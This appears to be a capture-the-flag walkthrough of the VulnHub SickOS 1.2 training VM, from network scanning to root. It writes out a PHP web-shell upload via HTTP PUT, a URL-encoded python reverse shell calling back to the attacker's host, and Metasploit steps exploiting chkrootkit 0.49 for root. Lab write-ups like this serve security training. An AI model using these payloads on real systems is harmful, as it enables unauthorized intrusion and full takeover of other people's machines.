[VulnHub] SickOS 1.2

“This is second in following series from SickOs and is independent of the prior releases, scope of challenge is to gain highest privileges on the system.” – D4rk

More information and OVA file download please check here.

Attacker & Target

Attacker: Kali2 Linux (10.1.1.132/24)

Target: SickOS: 1.2 (10.1.1.133/24)

Vulnerability & Exploit

File upload via HTTP PUT method
python reverse shell
chkrootkit 0.49 Local Root Exploit

Method

Scanned the network to discover the target server [arp-scan]
Port scanned the target to discover running services and open ports [masscan && nmap]
Use dirb tool to discover hidden directory [dirb]
Web application scanned to dig more information about web service [nikto]
Exploit HTTP PUT Method to upload one-line PHP shell
Use python reverse shell to get a better shell
Enumeration && Exploit chkrootkit 0.49 to get ROOT

Tools

All the tools used here can be found in Kali Linux

Walkthrough

Using arp-scan as routine to detect the target’s IP address (10.1.1.133 in this case).

root@kali:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.1.1.1  00:50:56:c0:00:08   VMware, Inc.
10.1.1.2  00:50:56:f1:61:7e   VMware, Inc.
10.1.1.133    00:0c:29:0f:eb:df   VMware, Inc.
10.1.1.254    00:50:56:f0:91:47   VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.290 seconds (111.79 hosts/sec). 4 responded

10.1.1.133 is our Target!

Then run masscan to detect opening ports on the target (masscan is much faster than nmap when doing a full ports scan, so here I use it to make a full scan and then use nmap to do a deep scan on target ports).

root@kali:~# masscan -p1-65535 10.1.1.133/32 --rate=10000

Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2016-06-05 04:39:01 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 22/tcp on 10.1.1.133
Discovered open port 80/tcp on 10.1.1.133

There are 2 ports (22, 80) detected by masscan, then I run nmap to do a deeper service scan.

# Nmap 7.12 scan initiated Sun Jun  5 14:40:00 2016 as: nmap -sV -A -O -v -oN 133_nmap.txt 10.1.1.133
Nmap scan report for 10.1.1.133
Host is up (0.00034s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)
|   2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)
|_  256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)
80/tcp open  http    lighttpd 1.4.28
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: lighttpd/1.4.28
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:0F:EB:DF (VMware)
... turncate ...

Run nikto to scan WEB application, but nothing found.

- Nikto v2.1.6/2.1.5
+ Target Host: 10.1.1.133
+ Target Port: 80
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ GET Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21

Then run dirb to discover potential hidden directories and one folder was found: /test/.

root@kali:~/myExercises/sickos1.2# dirb http://10.1.1.133/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Jun  5 14:46:31 2016
URL_BASE: http://10.1.1.133/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.1.1.133/ ----
+ http://10.1.1.133/index.php (CODE:200|SIZE:163)
==> DIRECTORY: http://10.1.1.133/test/

---- Entering directory: http://10.1.1.133/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sun Jun  5 14:46:34 2016
DOWNLOADED: 4612 - FOUND: 1

Then try to enumerate HTTP methods by using curl. Nothing found in / but lots methods are available in /test/ including method PUT:

root@kali:~/myExercises/sickos1.2# curl -v -X OPTIONS http://10.1.1.133/test
*   Trying 10.1.1.133...
* Connected to 10.1.1.133 (10.1.1.133) port 80 (#0)
> OPTIONS /test HTTP/1.1
> Host: 10.1.1.133
> User-Agent: curl/7.47.0
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< DAV: 1,2
< MS-Author-Via: DAV
< Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
< Location: http://10.1.1.133/test/
< Content-Length: 0
< Date: Sun, 05 Jun 2016 04:56:31 GMT
< Server: lighttpd/1.4.28
<
* Connection #0 to host 10.1.1.133 left intact

Now, uploading one-line PHP shell with PUT method.

root@kali:~/myExercises/sickos1.2# curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://10.1.1.133/test/shell.php
*   Trying 10.1.1.133...
* Connected to 10.1.1.133 (10.1.1.133) port 80 (#0)
> PUT /test/shell.php HTTP/1.1
> Host: 10.1.1.133
> User-Agent: curl/7.47.0
> Accept: */*
> Content-Length: 30
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 30 out of 30 bytes
< HTTP/1.1 200 OK
< Content-Length: 0
< Date: Sun, 05 Jun 2016 05:04:11 GMT
< Server: lighttpd/1.4.28
<
* Connection #0 to host 10.1.1.133 left intact

Now set up nc to listen on port 443 (tried port ‘4444’ but failed due to be blocked) and Then I tried to upload reverse shell via wget but failed for some reason and finally got the following method works:

root@kali:~# curl "http://10.1.1.133/test/shell.php?cmd=python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%2210.1.1.132%22%2C443%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3B%20os.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%22%2fbin%2fsh%22%2C%22-i%22%5D%29%3B%27"

Got a limited shell.

root@kali:~# nc -lvp 443
listening on [any] 443 ...
10.1.1.133: inverse host lookup failed: Unknown host
connect to [10.1.1.132] from (UNKNOWN) [10.1.1.133] 33544
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data

In order to get a better and stable shell, I set up metasploit and re-run the python shell again:

msf exploit(handler) > use exploit/multi/handler
msf exploit(handler) > set lport 443
lport => 443
msf exploit(handler) > set lhost 10.1.1.132
lhost => 10.1.1.132
msf exploit(handler) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf exploit(handler) >
msf exploit(handler) > run

[*] Started reverse TCP handler on 10.1.1.132:443
[*] Starting the payload handler...
[*] Command shell session 1 opened (10.1.1.132:443 -> 10.1.1.133:33545) at 2016-06-05 15:41:50 +1000

/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ^Z
Background session 1? [y/N]  y

After spending couple of hours to enumerate the target system and finally found an vulnerable program (chkrookit version 0.49) running on the system.

$ dpkg -l | grep chkroot
rc  chkrootkit                      0.49-4ubuntu1.1                   rootkit detector

Exploit chkrootkit to get ROOT!

msf exploit(handler) > use exploit/unix/local/chkrootkit
msf exploit(chkrootkit) > show options

Module options (exploit/unix/local/chkrootkit):

   Name        Current Setting       Required  Description
   ----        ---------------       --------  -----------
   CHKROOTKIT  /usr/sbin/chkrootkit  yes       Path to chkrootkit
   SESSION     1                     yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(chkrootkit) > set lport 8080
lport => 8080

msf exploit(chkrootkit) > run -j
[*] Exploit running as background job.

[*] Started reverse TCP double handler on 10.1.1.132:8080
[!] Rooting depends on the crontab (this could take a while)
msf exploit(chkrootkit) > [*] Payload written to /tmp/update
[*] Waiting for chkrootkit to run via cron...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo cywywDOR3lw9KtfF;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "cywywDOR3lw9KtfF\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 2 opened (10.1.1.132:8080 -> 10.1.1.133:47139) at 2016-06-05 15:47:03 +1000
[+] Deleted /tmp/update

msf exploit(chkrootkit) > sessions -l

Active sessions
===============

  Id  Type         Information                                             Connection
  --  ----         -----------                                             ----------
  1   shell linux  /bin/sh: 0: can't access tty; job control turned off $  10.1.1.132:443 -> 10.1.1.133:33545 (10.1.1.133)
  2   shell unix                                                           10.1.1.132:8080 -> 10.1.1.133:47139 (10.1.1.133)

msf exploit(chkrootkit) > sessions -i 2
[*] Starting interaction with 2...

587635846
xjfpouiBcdHXtWSGDLawUifFliLoRHgO
true
glQiWVKYGXJIbMNxCzFdLkHTvwzJXMsL
XhEJPxQGJEXCqeHWEuuyRuhgtzDjhhsG
lblxnAmeZfPiTZxaWNHygwoaqIzqbUNo
id
uid=0(root) gid=0(root) groups=0(root)

Then grab the FLAG file:

root@ubuntu:~# cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually.

Thanks for giving this try.

@vulnhub: Thanks for hosting this UP!.

F4l13n5n0w

Info Security & Pen Testing learning notes